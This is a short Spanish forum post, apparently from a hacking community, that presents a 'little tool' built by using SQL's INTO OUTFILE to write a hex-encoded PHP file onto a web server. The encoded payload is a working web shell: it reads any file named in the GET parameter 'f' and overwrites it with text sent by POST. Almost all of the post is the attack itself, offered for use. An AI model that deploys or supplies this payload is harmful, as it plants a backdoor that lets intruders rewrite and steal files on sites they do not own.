<? system(...
<? eval(....
me decidi en fabricar una pequeña herramientilla.
utilizando la instruccion OUTFILE...
Código
y con el codigo php.
SELECT 0x64 /* Hexadecimal */ INTO OUTFILE "C:/servidor/editor.php"; /* Path del servidor */
Código
ahora concluimos con este codigo y podremos editar archivos en el servidor...
Código
SELECT 0x3C3F7068702024663D245F4745545B2766275D3B24733D245F504F53545B2773275D3B6966282473213D2727297B69662824723D666F70656E2824662C27772B2729297B6677726974652824722C7374726970736C617368657328247329293B6563686F20274F4B3C62723E273B7D66636C6F7365282472293B7D24723D666F70656E2824662C277227293B24633D66726561642824722C66696C6573697A6528246629293B66636C6F7365282472293B6563686F20223C666F726D206D6574686F643D504F5354203E3C7465787461726561206E616D653D73203E24633C2F74657874617265613E3C62723E3C696E70757420747970653D7375626D69742076616C75653D67756172646172203E3C2F666F726D3E223B3F3E INTO OUTFILE "C:/servidor/editor.php";
el nombre del fichero se pasa por una variable GET llamada "f".
de la forma editor.php?f=index.php
Saludos de perro